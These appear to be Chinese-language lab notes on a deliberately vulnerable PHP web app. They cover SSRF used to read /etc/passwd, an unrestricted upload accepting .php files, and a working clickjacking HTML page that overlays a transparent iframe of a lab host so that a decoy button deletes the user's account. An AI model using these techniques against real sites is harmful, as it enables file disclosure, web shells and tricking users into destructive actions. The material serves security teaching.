SSRF
Server-side Request Forgery
- 源文件:/vulnerability/ssrf/ssrf.php
通过curl可获取图片,下载文件,读取文件内容等,尝试读取/etc/passwd
Clickjacking
- 源文件:/vulnerability/clickjacking/cj.php
源码就是删除自己账户,利用视觉欺骗手段,让用户在不知情的情况下,点击攻击者欺骗的位置
简单demo (需登录)
<html>
<head>
<meta charset="utf-8" />
<title>clickjacking demo</title>
<style>
html,body,iframe,div {
margin: 0px;
padding: 0px;
width: 100%;
height: 100%;
position:absolute;
}
</style>
</head>
<div style="z-index:999;opacity:0.3;">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" src="http://192.168.1.228/vulnerability/clickjacking/cj.php"></iframe>
</div>
<button style="cursor:pointer;position:absolute;top:152px;left:475px;text-align:center;">点我</button>
</html>
比如说像这样,点击外面‘点我’按钮,却触发的是delete删除用户
Clickjacking
- 源文件:/vulnerability/upload.php
可以上传任意文件,比如.php
之类的文件,在uploads目录,并且文件名也没改动